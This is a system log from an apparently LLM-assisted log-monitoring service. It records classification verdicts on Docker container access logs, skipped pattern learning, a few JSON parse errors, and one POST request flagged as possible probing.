Mar 19 22:34:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:21.813334 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:34:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:21.813377 [analyzer] Source hint mismatch: LLM says "docker container web service (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:24.751350 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 19 22:34:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:24.751385 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:25.873365 [llm] Failed to parse verdict from: {
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "classification": "safe",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "confidence": 0.86,
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "reason": "HTTP GET to an API logs endpoint returned 304 (not modified) with a sub-25ms response time; typical of normal caching/polling behavior.",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "action": "allow",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "pattern_type": "prefix",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "pattern": "GET /api/v2/user/apps/appData/api/logs?encoding=hex",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "source_hint": "docker container reverse-proxy / application HTTP logs",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   "variable_fields": [
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:       "token": "304",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:       "type": "",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:       "replacement": "<STATUS>"
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:       "token": "24.526 ms",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:       "type": "duration",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:       "replacement": "<DUR>"
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:     }
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]:   ]
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:25.873401 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:25.873410 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:34:23.620743872Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:34:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:27.741228 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:34:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:27.741267 [analyzer] Source hint mismatch: LLM says "docker container web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.691048 [analyzer] LLM verdict for docker:captain-netdata-container: classification=noise confidence=0.90 action=suppress pattern_type=prefix
Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.691088 [analyzer] Source hint mismatch: LLM says "netdata docker tc plugin / tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.965069 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.965105 [analyzer] Source hint mismatch: LLM says "docker container access log / reverse proxy (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:31.783432 [analyzer] LLM verdict for docker:captain-netdata-container: classification=noise confidence=0.72 action=suppress pattern_type=prefix
Mar 19 22:34:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:31.783465 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 19 22:34:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:33.031629 [analyzer] LLM verdict for docker:captain-netdata-container: classification=noise confidence=0.72 action=suppress pattern_type=prefix
Mar 19 22:34:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:33.031666 [analyzer] Source hint mismatch: LLM says "netdata tc-qos-helper (tc-qos-helper.sh) via docker container", actual is "captain-netdata-container" — skipping pattern
Mar 19 22:34:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:33.896462 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:34:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:33.896496 [analyzer] Source hint mismatch: LLM says "docker/captain container (web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.162335 [observer] Pipeline: processed=501 pattern_hits=267 llm_calls=233 llm_errors=4 learned=1
Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.162361 [observer] Patterns: hash=267 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=234
Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.910139 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.910219 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:39.738941 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:34:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:39.738978 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:42.665428 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:34:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:42.665463 [analyzer] Source hint mismatch: LLM says "docker/captain web service access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:45.669393 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains
Mar 19 22:34:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:45.669431 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:48.742812 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:34:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:48.742847 [analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:51.701107 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:34:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:51.701147 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) serving an API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:54.706278 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:34:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:54.706313 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:57.677602 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=regex
Mar 19 22:34:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:57.677642 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (container web request logging)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:03.731063 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:35:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:03.731103 [analyzer] Source hint mismatch: LLM says "docker container access log / web application", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.163493 [observer] Pipeline: processed=525 pattern_hits=281 llm_calls=243 llm_errors=4 learned=1
Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.163517 [observer] Patterns: hash=281 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=244
Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.903054 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.903091 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:07.794590 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:35:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:07.794623 [analyzer] Source hint mismatch: LLM says "nginx/docker access log", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:35:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:09.831345 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:35:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:09.831385 [analyzer] Source hint mismatch: LLM says "docker/captain (web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:12.710890 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:35:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:12.710921 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:15.709528 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.63 action=suppress pattern_type=prefix
Mar 19 22:35:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:15.709563 [analyzer] Source hint mismatch: LLM says "docker container access log / web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:18.821416 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:35:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:18.821455 [analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:21.570339 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains
Mar 19 22:35:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:21.570373 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:24.547265 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:35:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:24.547300 [analyzer] Source hint mismatch: LLM says "docker (container access log / web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:25.618527 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:35:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:25.618564 [analyzer] Source hint mismatch: LLM says "docker-captain api/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:27.577336 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:35:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:27.577376 [analyzer] Source hint mismatch: LLM says "docker-container-http-access", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:30.713207 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:35:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:30.713241 [analyzer] Source hint mismatch: LLM says "docker/captain container web access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:34.029087 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:35:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:34.029124 [analyzer] Source hint mismatch: LLM says "docker container access log for web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.161396 [observer] Pipeline: processed=551 pattern_hits=296 llm_calls=254 llm_errors=4 learned=1
Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.161417 [observer] Patterns: hash=296 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=255
Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.763235 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.763272 [analyzer] Source hint mismatch: LLM says "docker container web service access log (API gateway/app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:39.674858 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:35:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:39.674892 [analyzer] Source hint mismatch: LLM says "docker container HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:42.944500 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix
Mar 19 22:35:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:42.944539 [analyzer] Source hint mismatch: LLM says "docker (containerized web/API service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:45.836525 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:35:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:45.836559 [analyzer] Source hint mismatch: LLM says "docker container web/app access logger (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:48.644525 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:35:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:48.644566 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:51.742352 [llm] Failed to parse verdict from: {
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "classification": "safe",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "confidence": 0.62,
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "reason": "HTTP GET request to an application logs endpoint returning 304 (not modified) with a short duration appears to be normal polling/caching behavior.",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "action": "allow",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "pattern_type": "prefix",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "pattern": "GET /api/v2/user/apps/appData/api/logs?encoding=hex",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "source_hint": "docker/captain container access log",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   "variable_fields": [
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:       "token": "304",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:       "type": "request_id",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:       "replacement": "<STATUS>"
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:       "token": "21.879 ms",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:       "type": "duration",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:       "replacement": "<DUR>"
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:     }
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]:   ]
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:51.742390 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:51.742400 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:35:50.599959265Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:35:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:54.696697 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:35:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:54.696730 [analyzer] Source hint mismatch: LLM says "docker (container access logs / app web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:57.938082 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:35:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:57.938118 [analyzer] Source hint mismatch: LLM says "docker/container web access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:00.889897 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:36:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:00.889933 [analyzer] Source hint mismatch: LLM says "docker container web/api (reverse proxy or app logger)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:03.937694 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:36:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:03.937778 [analyzer] Source hint mismatch: LLM says "docker container access log / web server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.162461 [observer] Pipeline: processed=573 pattern_hits=308 llm_calls=264 llm_errors=5 learned=1
Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.162490 [observer] Patterns: hash=308 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=265
Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.684664 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.684703 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:09.581612 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:36:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:09.581660 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:12.968290 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:36:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:12.968327 [analyzer] Source hint mismatch: LLM says "docker/captain reverse proxy or web service (HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:15.585127 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:36:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:15.585189 [analyzer] Source hint mismatch: LLM says "docker/captain web access log (application request logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:16.017993 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.70 action=alert pattern_type=
Mar 19 22:36:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:16.018025 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx/Docker access log shows an HTTP POST to root path with a 405 (method not allowed) from an external IP; may indicate probing or an unexpected client behavior. Line=2026-03-19T22:36:14.717310354Z 35.222.125.2 - - [19/Mar/2026:22:36:14 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 150 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWe...
Mar 19 22:36:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:18.725153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:36:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:18.725203 [analyzer] Source hint mismatch: LLM says "docker container access logs (captain) / API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:21.795901 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:36:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:21.795940 [analyzer] Source hint mismatch: LLM says "docker/captain web application (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:24.758415 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:36:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:24.758455 [analyzer] Source hint mismatch: LLM says "docker container access log (API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:25.891777 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:36:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:25.891818 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access log (app service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:27.839760 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:36:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:27.839793 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:30.827482 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:36:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:30.827524 [analyzer] Source hint mismatch: LLM says "docker containerized web/app server access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
